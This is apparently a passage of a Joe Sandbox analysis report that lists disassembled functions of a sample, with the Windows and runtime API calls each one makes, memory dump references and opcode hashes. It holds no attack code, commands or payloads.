                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0019A79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  • Opcode ID: 9c2d87af03ab595fd7acafb11c619f132207fd4212e2ffe4f473eee3bf0744b2
                  • Instruction ID: 46dafc01fb731eb0622c93a78a4cdc9d84ad5dbe0910d38e3735b21103054f08
                  • Opcode Fuzzy Hash: 9c2d87af03ab595fd7acafb11c619f132207fd4212e2ffe4f473eee3bf0744b2
                  • Instruction Fuzzy Hash: 49011336540208BBCF06AFA0DC02EEE7F66FF09710F454114FE1826160CB328A71AB92
                  Function 0019A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00199D2F), ref: 0019A715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 0019A6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  • Opcode ID: 78146d3877ee2c04f05cc48b7d588f1ff3b5e64379a4ca07ebca8d5cef1c1ab4
                  • Instruction ID: 094531a0805620102427ab48dbb8a5999a9ce6c9bb3d78d6dfd31032e1190cf9
                  • Opcode Fuzzy Hash: 78146d3877ee2c04f05cc48b7d588f1ff3b5e64379a4ca07ebca8d5cef1c1ab4
                  • Instruction Fuzzy Hash: 70F0E23564521CBBCF056F60CC0ADAEBFA1FF16760B454054FC191A260DB729E50EBD1
                  Function 0019A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: bb24eeba6455b0a6135d1805f8cd8514a498127de8fa0fd6cec6a8e1420ee86b
                  • Instruction ID: 933b293b84e8b99a4edf22a9e1b4ebb0b6496a6f886aacbf32bbb87cb5cc14cc
                  • Opcode Fuzzy Hash: bb24eeba6455b0a6135d1805f8cd8514a498127de8fa0fd6cec6a8e1420ee86b
                  • Instruction Fuzzy Hash: FBE05570B452286BDB146B608C06AAEBB90DF26710B820015FC0817280CF704F00AAD6
                  Function 0019329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 001932AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: 62542b19b851c294adc3422c5b2d64212ccf0d88c5cc2ede0da3359dec3a9aca
                  • Instruction ID: b24702b6f2c361b20424c2d6b5864fcdf64e63f734e57e1de0895e576e405923
                  • Opcode Fuzzy Hash: 62542b19b851c294adc3422c5b2d64212ccf0d88c5cc2ede0da3359dec3a9aca
                  • Instruction Fuzzy Hash: 75D02B66B846346AC61236D06C03AAE7E458703FF1F450162FE0C1A14387A1464002C5
                  Function 0018E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018E20B
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3Ro
                  • API String ID: 1269201914-1492261280
                  • Opcode ID: c21b7b4414225026317cad98c4fda804d0165a4a23c8b76a7ae78b33e12c9ff1
                  • Instruction ID: 11f1753ee468011696cf7cdc7e7b60850e4391c74e9b6c0c5d8f944154a109b8
                  • Opcode Fuzzy Hash: c21b7b4414225026317cad98c4fda804d0165a4a23c8b76a7ae78b33e12c9ff1
                  • Instruction Fuzzy Hash: C1B012A526E1017C320C31017E06C37036DC6D0B51330801FF215E40C1D7404E065932
                  Function 0019B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0019AF1B: GetOEMCP.KERNEL32(00000000,?,?,0019B1A5,?), ref: 0019AF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0019B1EA,?,00000000), ref: 0019B3C4
                  • GetCPInfo.KERNEL32(00000000,0019B1EA,?,?,?,0019B1EA,?,00000000), ref: 0019B3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 34c7f1c30d0fba45be9b781d7c665c242bccbd1104260855e6940488eafef980
                  • Instruction ID: cd0186fa237942127dbbd6d24b5b218b44f8b31b6cbb6a86f81ec5b2504eae4c
                  • Opcode Fuzzy Hash: 34c7f1c30d0fba45be9b781d7c665c242bccbd1104260855e6940488eafef980
                  • Instruction Fuzzy Hash: 31515470A082059EDF249F75E9C06BABBE5EF51310F18806EE0978B253D7399946EB81
                  Function 00171385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00176057: __EH_prolog.LIBCMT ref: 0017605C
                    • Part of subcall function 0017C827: __EH_prolog.LIBCMT ref: 0017C82C
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C86F
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C893
                  • new.LIBCMT ref: 001713FE
                    • Part of subcall function 0017B07D: __EH_prolog.LIBCMT ref: 0017B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: eb45b1bc762ee8919f0d10139ba77fc17ebf4c8af98783c9b0f1fc28f087e7fd
                  • Instruction ID: 2327c7de85dfdf68c4f8067208ce8e91dbae84f721a8b666b83b9433a3308175
                  • Opcode Fuzzy Hash: eb45b1bc762ee8919f0d10139ba77fc17ebf4c8af98783c9b0f1fc28f087e7fd
                  • Instruction Fuzzy Hash: 164116B0905B40DED724DF7984859E6FAF6FB28300F504A2EE6EE83282DB326554CB11
                  Function 00171380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00176057: __EH_prolog.LIBCMT ref: 0017605C
                    • Part of subcall function 0017C827: __EH_prolog.LIBCMT ref: 0017C82C
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C86F
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C893
                  • new.LIBCMT ref: 001713FE
                    • Part of subcall function 0017B07D: __EH_prolog.LIBCMT ref: 0017B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 20737230d4ac0a86b26aa68847b18568b23f3f2c70de19dfeafeaf108705c889
                  • Instruction ID: e8d602a7cb6cc43a8d85faedd9e395077f1eacce687c0f1c9136302586a471e9
                  • Opcode Fuzzy Hash: 20737230d4ac0a86b26aa68847b18568b23f3f2c70de19dfeafeaf108705c889
                  • Instruction Fuzzy Hash: 634116B0905B409ED724DF7984859E7FAF5FB29300F504A2EE5EE83282DB326554CB11
                  Function 0019B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00198FA5: GetLastError.KERNEL32(?,001B0EE8,00193E14,001B0EE8,?,?,00193713,00000050,?,001B0EE8,00000200), ref: 00198FA9
                    • Part of subcall function 00198FA5: _free.LIBCMT ref: 00198FDC
                    • Part of subcall function 00198FA5: SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 0019901D
                    • Part of subcall function 00198FA5: _abort.LIBCMT ref: 00199023
                    • Part of subcall function 0019B2AE: _abort.LIBCMT ref: 0019B2E0
                    • Part of subcall function 0019B2AE: _free.LIBCMT ref: 0019B314
                    • Part of subcall function 0019AF1B: GetOEMCP.KERNEL32(00000000,?,?,0019B1A5,?), ref: 0019AF46
                  • _free.LIBCMT ref: 0019B200
                  • _free.LIBCMT ref: 0019B236
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: ad38e3ed4d2943a6fd6166db8ba30361bf1bf44e68431e05fc96ec08a7e0ee86
                  • Instruction ID: 5a162f6686c3d440db08ca70e00748577ea65f58936e7cca18c8553d627c51df
                  • Opcode Fuzzy Hash: ad38e3ed4d2943a6fd6166db8ba30361bf1bf44e68431e05fc96ec08a7e0ee86
                  • Instruction Fuzzy Hash: A231EB31908208AFDF10EFA9E991BADB7F5EF56320F2540A9F4149B291EB71AD41CB50
                  Function 0017971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00179EDC,?,?,00177867), ref: 001797A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00179EDC,?,?,00177867), ref: 001797DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 1250524b07b7dfc82e64d27a743c19f69c285dc5da2c963180c17207a98ca5c2
                  • Instruction ID: 65e2c3943f99373596e3c0c3d2949d3cfcb02d00ecaac53149f36cdc597fb262
                  • Opcode Fuzzy Hash: 1250524b07b7dfc82e64d27a743c19f69c285dc5da2c963180c17207a98ca5c2
                  • Instruction Fuzzy Hash: E021F6B1114748AFD7348F64CC86BA777F8EB49764F00892DF5E9821A1C374AC898F61
                  Function 00179D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                  Download Yara Rule
                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00177547,?,?,?,?), ref: 00179D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00179E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: f61f29ce719aed4da345dd954d567ecd31a6d5a579dc263156421de270cde6ae
                  • Instruction ID: d16f3dcba636dfa8a3a1433c69212bb14e2a33c36062eb1afa151e4217c0f2f0
                  • Opcode Fuzzy Hash: f61f29ce719aed4da345dd954d567ecd31a6d5a579dc263156421de270cde6ae
                  • Instruction Fuzzy Hash: 1621D631148286AFC725DE64C451EABBBF4AF56704F04881DB8D587541D329DA0CDB51
                  Function 0019A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0019A4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0019A4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: 80c6c35aac183d3161e3c473c3bce533136377885dfa9228f5b4bc114b51ffb4
                  • Instruction ID: 76da2874eeb7df2114460ddc23db1788340e204ab4317cf40117063b253c5232
                  • Opcode Fuzzy Hash: 80c6c35aac183d3161e3c473c3bce533136377885dfa9228f5b4bc114b51ffb4
                  • Instruction Fuzzy Hash: A6112933A011209B9F2ADE2CEC4496A73D59F81320B5E4220FD19EB644EB70EC85CBD2
                  Function 00179B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00179B35,?,?,00000000,?,?,00178D9C,?), ref: 00179BC0
                  • GetLastError.KERNEL32 ref: 00179BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 9ee4b7c5a9086d57386cbdb556cdae328182931bb78bc61621921ed21bc5f643
                  • Instruction ID: 39c09368d12dde0ec8496b4e27ee924c52652af6f28528e6f53e4ebccb5e220f
                  • Opcode Fuzzy Hash: 9ee4b7c5a9086d57386cbdb556cdae328182931bb78bc61621921ed21bc5f643
                  • Instruction Fuzzy Hash: DB01C4313042159B8B08CE65AC94D7EB3B9EFC5722B14C62EF92A87290CB35D94D9B21
                  Function 00179E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00179E76
                  • GetLastError.KERNEL32 ref: 00179E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 6c65bc3eb560cf5ea35fca32d57eb19817431acac9bacd3615cbc012d7b1bb74
                  • Instruction ID: 479e4f93896bc8c34b28d71b08979bb6c660e0f9e28689a002b9d1a652f7d771
                  • Opcode Fuzzy Hash: 6c65bc3eb560cf5ea35fca32d57eb19817431acac9bacd3615cbc012d7b1bb74
                  • Instruction Fuzzy Hash: 9F019A713042006BEB34DE29DC88B6BB6E99B89324F14893EF15AC2680DF35ED8C8711
                  Function 00198606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00198627
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,001B0F50,0017CE57,?,?,?,?,?,?), ref: 00198663
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap$_free
                  • String ID:
                  • API String ID: 1482568997-0
                  • Opcode ID: 4e6f5522b97f311d96d8338ae19a31cf7873fdf24184a52d58940851e14dfd07
                  • Instruction ID: dabcbefd4888541f4b3b8866328bea81afa3efb4fce0a7ff2fbdd08d0a087189
                  • Opcode Fuzzy Hash: 4e6f5522b97f311d96d8338ae19a31cf7873fdf24184a52d58940851e14dfd07
                  • Instruction Fuzzy Hash: 62F02432202115BADF212A39AC00F6F376DAFE3BB0F264126F8249F191DF30CC0095A4
                  Function 00180908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 00180915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 0018091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: 898ff094ef801159e68de66ee0c39356bc6968ea36f5bc9eab1815d960591060
                  • Instruction ID: 8220eefaef707477b05c870f1290cf1d3137e739a034b90a4807f0d5cb4a038e
                  • Opcode Fuzzy Hash: 898ff094ef801159e68de66ee0c39356bc6968ea36f5bc9eab1815d960591060
                  • Instruction Fuzzy Hash: C4E06533E1110DAB6F4A9AA49C045BA739DDB092187125169F81AD3501E730DF058B60
                  Function 0017A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A458
